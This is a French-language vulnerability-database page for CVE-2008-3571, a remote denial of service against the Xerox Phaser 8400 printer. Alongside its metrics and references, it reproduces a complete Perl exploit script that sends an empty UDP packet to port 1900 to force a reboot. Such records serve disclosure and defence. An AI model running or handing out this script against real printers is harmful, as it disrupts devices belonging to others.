CVE-2008-3571 : Détail

CVE-2008-3571

A03-Injection
80.68%V3
Network
2008-08-10
18h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The Xerox Phaser 8400 allows remote attackers to cause a denial of service (reboot) via an empty UDP packet to port 1900.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 6196

Date de publication : 2008-08-02 22h00 +00:00
Auteur : crit3rion
EDB Vérifié : Yes

#!/usr/bin/perl # carved-out by: crit3rion, just making th3 world a b3tt3r plac3! # Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3 for reminding me to close my #$*&*! s0ck3t) # Make: Xerox # Model: Phaser 8400 # Firmware: 03/03/2004 # # What's the deal? # Apparently, if you send an empty packet to a Xerox Phaser 8400 printer # the printer will reboot. Tested successfully on four printers. # # Let's not leave our maliciousness open to exploitation and errors! use strict; use warnings; use IO::Socket::INET; # What's your printer's IP Address? print "Please enter the printers IP:\n"; my $ipaddr = <STDIN>; chomp $ipaddr; # Let's setup the connection... my $socket = IO::Socket::INET->new( PeerPort => 1900, PeerAddr => $ipaddr, Proto => "udp" ) or die "I tried. Maybe you entered the wrong IP?\n Maybe it's just my bad code...\n In any case, check: $@\n\n"; # Okay... Let's kill it. $socket->send(""); $socket->close(); print "Done. It should have died.\n\n"; exit(1); # milw0rm.com [2008-08-03]

Products Mentioned

Configuraton 0

Xerox>>Phaser >> Version 8400

    Références

    http://securityreason.com/securityalert/4128
    Tags : third-party-advisory, x_refsource_SREASON
    https://www.exploit-db.com/exploits/6196
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.securityfocus.com/bid/30522
    Tags : vdb-entry, x_refsource_BID
    http://www.vupen.com/english/advisories/2008/2308
    Tags : vdb-entry, x_refsource_VUPEN
    http://secunia.com/advisories/31329
    Tags : third-party-advisory, x_refsource_SECUNIA